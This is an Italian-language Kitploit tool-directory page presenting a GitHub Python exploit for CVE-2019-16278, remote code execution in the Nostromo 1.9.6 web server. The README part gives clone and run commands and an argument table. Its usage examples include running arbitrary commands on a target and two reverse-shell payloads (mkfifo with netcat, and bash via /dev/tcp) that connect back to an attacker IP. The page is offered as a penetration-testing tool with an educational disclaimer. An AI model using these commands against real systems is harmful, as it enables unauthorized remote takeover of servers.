Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — Un attaccante non autenticato può forzare il server a puntare a un file di shell come ‘/bin/sh’ ed eseguire comandi arbitrari a causa della mancata verifica dell'URL, che porta a un path traversal verso qualsiasi file presente nel sistema. Versioni di Nostromo come la 1.9.6 non verificano questo URL. | Kitploit
Strumenti/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Un attaccante non autenticato può forzare il server a puntare a un file di shell come ‘/bin/sh’ ed eseguire comandi arbitrari a causa della mancata verifica dell'URL, che porta a un path traversal verso qualsiasi file presente nel sistema. Versioni di Nostromo come la 1.9.6 non verificano questo URL.

Condividi

POC

Repository: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Descrizione

Questo repository contiene un exploit in Python per CVE-2019-16278, una vulnerabilità in Nostromo 1.9.6 (un server web). La vulnerabilità consente l'esecuzione remota di codice (RCE) sfruttando il directory traversal per eseguire comandi arbitrari sul sistema target.

🚀 Caratteristiche

  • Esecuzione di comandi shell personalizzati sul target vulnerabile.
  • Supporto per payload di reverse shell.
  • Possibilità di personalizzare la dimensione della risposta del target.

🛠️ Requisiti

  • Python 3.x
  • Una macchina che esegue Nostromo 1.9.6 (il target vulnerabile).
  • Netcat (nc) per ricevere le reverse shell.

⚙️ Utilizzo

Step 1: Clonare il Repository

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Step 2: Eseguire l'Exploit

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Argomenti:

ArgomentoDescrizioneObbligatorioDefault
-t, --targetL'indirizzo IP del targetSìNessuno
-p, --portLa porta del targetSìNessuno
-c, --commandIl comando da eseguire sul serverSìNessuno
-b, --bytesNumero di byte da leggere nella rispostaNo4096

🧑‍💻 Esempi

Esempio 1: Eseguire whoami sul Target

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Esempio 2: Reverse Shell con Netcat

Step 1: Avviare un listener Netcat sulla macchina dell'attaccante:

root@kitploit:~
nc -lvnp 443

Step 2: Eseguire l'exploit con un payload di reverse shell:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Esempio 3: Reverse Shell tramite /dev/tcp

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Dettagli sulla Vulnerabilità

  • CVE: CVE-2019-16278
  • Software interessato: Server Web Nostromo 1.9.6
  • Tipo: Directory Traversal -> Esecuzione Remota di Codice

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi. Non utilizzarlo su sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare. L'accesso non autorizzato ai sistemi è illegale. Usalo in modo responsabile.

Scarica lo strumento